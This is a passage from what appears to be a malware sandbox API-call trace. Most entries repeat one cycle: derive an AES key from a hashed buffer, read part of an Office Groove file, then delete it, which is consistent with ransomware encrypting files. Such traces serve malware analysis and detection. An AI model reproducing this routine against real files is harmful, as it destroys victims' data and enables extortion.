(hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.407] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.407] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x850 [0166.407] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.424] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.424] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.424] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsbrowserupgrade.html")) returned 1 [0166.427] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.427] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.427] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.427] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.427] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ed [0166.427] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.441] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.441] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.441] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.442] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formscolorchart.html")) returned 1 [0166.443] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.444] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.444] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.444] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.444] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc94 [0166.444] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.469] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.469] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.469] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsformtemplate.html")) returned 1 [0166.471] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.472] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.472] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.472] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.472] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc7c [0166.472] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.474] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.474] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepage.html")) returned 1 [0166.476] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.477] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.477] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.477] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.477] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1dda [0166.477] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.480] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.480] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.480] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepagescript.js")) returned 1 [0166.482] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.483] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.483] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.483] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.483] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec [0166.483] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.485] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.485] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.485] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepagestyle.css")) returned 1 [0166.487] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.488] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.488] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.488] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.488] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7ee [0166.488] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.490] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.490] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.490] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsimagetemplate.html")) returned 1 [0166.493] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.494] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.494] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.494] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.494] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x856 [0166.494] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.496] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.496] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsmacrotemplate.html")) returned 1 [0166.499] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.500] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.500] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.500] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.500] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x46fe [0166.500] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.524] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.524] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.524] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.526] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formspreviewtemplate.html")) returned 1 [0166.527] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.528] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.528] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.528] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.528] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x612 [0166.528] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.530] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.530] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.530] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsprinttemplate.html")) returned 1 [0166.542] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.543] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.544] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.544] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.544] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.544] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a1 [0166.544] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.550] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.550] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.550] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.551] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\adobe.css")) returned 1 [0166.552] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.552] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.553] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.553] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.553] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.553] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa32 [0166.553] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.555] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.555] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.555] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana.css")) returned 1 [0166.558] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.558] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.559] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.559] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.559] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.559] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc4f [0166.559] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.571] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.571] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.571] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue.css")) returned 1 [0166.574] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.574] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.575] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.575] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.575] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.575] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd45 [0166.575] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.593] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.593] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.593] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay.css")) returned 1 [0166.595] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.603] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0166.604] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0166.604] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.604] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0166.604] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x143 [0166.604] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0166.605] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.605] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0166.605] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.606] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\background.gif")) returned 1 [0166.608] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0166.608] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0166.608] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.608] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0166.608] GetFileSize (in: hFile=0x508, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb9 [0166.608] ReadFile (in: hFile=0x508, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0166.610] CryptDestroyHash (hHash=0x284d728) returned 1 [0166.610] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0166.610] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\button.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\button.gif")) returned 1 [0166.613] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0166.613] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0166.613] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.613] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0166.613] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x155 [0166.613] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0166.615] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.615] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0166.615] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\tab_off.gif")) returned 1 [0166.617] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0166.617] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0166.617] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.617] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0166.617] GetFileSize (in: hFile=0x508, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xde [0166.618] ReadFile (in: hFile=0x508, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0166.619] CryptDestroyHash (hHash=0x284d728) returned 1 [0166.619] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0166.619] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\tab_on.gif")) returned 1 [0166.622] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced 